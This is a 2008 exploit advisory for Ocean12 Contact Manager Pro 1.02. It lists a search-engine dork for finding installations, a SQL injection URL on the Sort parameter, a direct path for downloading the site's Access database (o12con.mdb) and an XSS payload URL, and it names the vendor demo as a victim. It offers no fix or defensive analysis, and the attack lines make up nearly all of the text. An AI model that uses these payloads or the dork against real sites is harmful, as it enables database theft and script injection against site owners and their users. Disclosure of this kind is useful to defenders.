Ocean12 Contact Manager Pro (SQL-XSS-DDV) Multiple Vulnerabilities

2008-11-27 21:30:06

#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Contact Manager Pro
Version : 1.02
Vendor : http://ocean12tech.com/products/contact
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
Author : Pouya_Server , [email protected]
Vulnerability : (DDV,XSS,SQL)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]

[Database Disclosure Vulnerability]:
http://site.com/path/o12con.mdb

[XSS]:
http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server
---------------------------------
Victem :
http://ocean12tech.com/products/contact/demo

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.